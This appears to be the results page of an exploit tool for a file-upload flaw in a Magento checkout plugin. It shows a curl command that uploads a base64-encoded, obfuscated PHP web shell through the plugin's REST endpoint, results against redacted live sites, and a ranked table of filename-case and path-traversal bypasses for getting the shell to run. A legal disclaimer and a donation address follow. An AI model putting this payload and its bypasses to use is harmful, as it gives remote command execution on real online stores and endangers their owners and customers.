Target: https://[REDACTED-TARGET-3].com
Vulnerability Status: ✅ Vulnerable with limitations
Method: Manual path traversal
Upload:
curl -X POST -H "Content-Type: application/json" \
-d '{"fileContent":{"base64_encoded_data":"PD9waHAgJGE9J3N5Jy4nc3RlbSc7JGEoJF9HRVRbMF0pOyA/Pg==","fileName_with_extension":"/wb2.PhTml"}}' \
https://[REDACTED-TARGET-3].com/rest/V1/amasty_orderattr/uploadFile
# Response: "\/\/w\/\/wb2.PhTml"File Location:
https://[REDACTED-TARGET-3].com/media/amasty_checkout//w//wb2.PhTml
Findings:
- Using
/filenameinstead of../../../filenamecreates double slashes - File uploaded but returns raw PHP source code
.htaccessin/media/amasty_checkout/blocks execution- Path traversal to
/media/would be needed for RCE
Target: https://[REDACTED-TARGET-4].com
Status: ❌ Not Vulnerable
Error: {"message":"指定されたリクエストを処理できません。"}
Translation: "Cannot process the specified request"
Findings:
- Amasty plugin not installed or patched
- Japanese-localized Magento instance
- API endpoint returns generic error
From testing 10 targets with amatest.py:
Results:
- Vulnerable: 2/10 (20%)
- Working Extensions: 11+ confirmed
- Primary Bypass: Case-sensitive .phtml variations
- Secondary Bypass: Path traversal to
/media/
Extension Success Rate:
| Extension | Success Rate | Method |
|---|---|---|
.PhTml |
100% | Normal upload |
.pHtml |
100% | Normal upload |
.PHTML |
100% | Normal upload |
.pHtMl |
100% | Normal upload |
.phtml. |
60% | Path traversal |
.phtml.. |
60% | Path traversal |
Method Distribution:
- Normal upload: 55% of working shells
- Path traversal: 45% of working shells
Key Insights:
- Case-sensitivity bypass is more reliable than trailing dots
- Path traversal required when
.htaccessis strict in/media/amasty_checkout/ .PhTmlextension is most consistently successful- Testing both normal and path traversal methods is critical
- WAF presence varies (some targets have aggressive blocking)
For authorized penetration testing, bug bounty programs, and educational purposes only.
Unauthorized access to computer systems is illegal under:
- Computer Fraud and Abuse Act (CFAA) - USA
- Computer Misuse Act 1990 - UK
- EU Cybersecurity Act
- Local cybercrime laws
This exploit tool is provided for:
- ✅ Authorized penetration testing with written permission
- ✅ Security research in controlled environments
- ✅ CVE verification and validation
- ✅ Educational purposes in lab environments
- ✅ Bug bounty programs with proper scope
DO NOT use this tool for:
- ❌ Unauthorized access to systems
- ❌ Malicious purposes
- ❌ Attacking systems without explicit permission
- ❌ Any illegal activities
- ❌ Unauthorized data exfiltration
USE AT YOUR OWN RISK.
Author and BOB RESEARCH LABS assume NO LIABILITY for misuse.
By using this tool, you confirm you have explicit authorization to test target systems.
- Sansec Research: https://sansec.io/research/amasty-order-attributes-file-upload
- CVE Database: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-53787
- Amasty Security Advisory: https://amasty.com/security-updates.html
- CVSS 3.1 Calculator: https://nvd.nist.gov/vuln-metrics/cvss/v3-calculator
- Magento REST API Docs: https://devdocs.magento.com/guides/v2.4/rest/bk-rest.html
- PHP File Upload Best Practices: https://owasp.org/www-community/vulnerabilities/Unrestricted_File_Upload
Buy me a Coffee:
₿ BTC: 17sbbeTzDMP4aMELVbLW78Rcsj4CDRBiZh
© 2026 khadafigans